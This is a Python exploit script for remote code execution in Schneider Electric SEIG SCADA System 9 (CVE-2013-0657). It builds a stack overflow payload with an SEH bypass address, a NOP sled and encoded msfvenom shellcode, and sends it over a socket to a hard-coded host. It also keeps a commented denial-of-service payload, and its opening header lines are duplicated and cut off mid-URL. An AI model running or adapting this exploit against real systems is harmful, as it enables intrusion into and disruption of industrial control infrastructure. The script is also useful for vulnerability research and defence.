# Title: SEIG SCADA SYSTEM 9 - Remote Code Execution
# Author: Alejandro Parodi
# Date: 2018-08-17
# Vendor Homepage: https://www.schneider-electric.com
# Software Link: https://ww # Title: SEIG SCADA SYSTEM 9 - Remote Code Execution
# Author: Alejandro Parodi
# Date: 2018-08-17
# Vendor Homepage: https://www.schneider-electric.com
# Software Link: https://www.schneider-electric.ie/en/download/document/V9_Full_installation_package_register_and_receive_file/
# Version: v9
# Tested on: Windows7 x86
# CVE: CVE-2013-0657
# References:
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0657

import socket
import struct

ip = "192.168.0.23"
port = 12397
con = (ip, port)

# DoS Payload found in the research (CRUNCHBASE UNEXPECTED PARAMETER)
# length = "x00x70x00x00x00x00x00x00"
# message = "x00x70AAx65x00x00x00AAAAAAAAAAAAAAAAx00x00x00x00"+"B"*28644
# payload = length+message

# Exploit Magic
message_header = struct.pack("<L", 0x6014) + "x66x66x07x00"
message_protocol_data = "x10x00x00x00" + "x19" + "x00x00x00x00x00" + "x04" + "x00x00x00" + struct.pack(">H", 0x6000)
padding = "B" * 3344
eip_safeseh_bypass_address = struct.pack("<L", 0x0F9C520B) # pop, pop, ret to stack payload in exprsrv.dll (Windows Library without SafeSEH)

# Shellcode: ./msfvenom -a x86 --platform windows -p windows/exec cmd=calc EXITFUNC=thread -e x86/shikata_ga_nai -i 5 -b 'x00xFFx0Ax0D' -f python
# If EXITFUNC is not defined the application enter in a Loop that kill the VM resources
nopsleed = "x41"*100 # x90 bad char bypass
shellcode = "xdaxcbxbdx0fx83x69x70xd9x74x24xf4x58x31"
shellcode += "xc9xb1x4bx83xe8xfcx31x68x14x03x68x1bx61"
shellcode += "x9cxa9xcfxd8x3axb3x6exfcx1cx37x54xf6xc7"
shellcode += "x93x5dx47xb3xd2x35xb1x3fx7dxdcx42xd7x81"
shellcode += "x59x48x93x7bx98x70x2ax6bx98x14xeaxc5x54"
shellcode += "x17x7cx8dx25x69x60x27x1exc7x8ax6axd8xcf"
shellcode += "xb6xc3x9dx5ax83xd6xeax88x14x7dx5ax55x71"
shellcode += "x90x85xb8x37x9ex3exd7x1ax76xf8xb1xb9x63"
shellcode += "xb7xefxa3xa6xc0xb8x12xb4x18x62x1axe1x9e"
shellcode += "x6fx7exa2x86x6cxf7x3ax31xbdx55x42x10xad"
shellcode += "x89x16xa0xb8x6axd6x4cx20xd9xadx81x58x77"
shellcode += "x0bxa3xaaxbax2cx49xf0x26xaaxabxcex5axc3"
shellcode += "x41x69x60xc4x58x71x71x9cx3fxbexc2xbcx49"
shellcode += "xddxabx89xf0x46xcbx1ax8axf1xdbxe5x54x1f"
shellcode += "xfbx30x3bxb1x17x97xb2x3ex31xf8x26x13x9c"
shellcode += "x16xddx26x7axe3x9bx6ex29x77x49xc7x97x98"
shellcode += "x39x7bx5fxcdxebx4ax39x6ex66x04xbcx6cxa6"
shellcode += "x87x01x63x4dxf3x35xc9x74x35xdfxe7x1fx0c"
shellcode += "xd0x69x80x8cx5cxdex63xfcx19x1bx8ex24x3b"
shellcode += "x7ex01x97x6fx67x8fx07x3fx32x13x23x80x7e"
shellcode += "x9ax01x5axc0x3cxf9xf5x5ax04xb0x54x46x0c"
shellcode += "xfbx21x4dxd7xe0xb4x02xe5x4cx04x5ax5ex37"
shellcode += "xd1x61x6dxe1x4dxe8xa8xdfx26xdbx55x5ax60"
shellcode += "x85x68x05x6ax21x73xdfx73xa4xefx26x02x7e"
shellcode += "xb0xb1xa6xb1xacx15x0fx80x34xaexe4x8a"

JUNK = "JUNK"*5202 # 20808 Bytes of JUNK

payload = message_header + message_protocol_data + padding + eip_safeseh_bypass_address + nopsleed + shellcode + JUNK
print "Payload length: "+str(len(payload))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(con)
s.send(payload)
s.recv(10)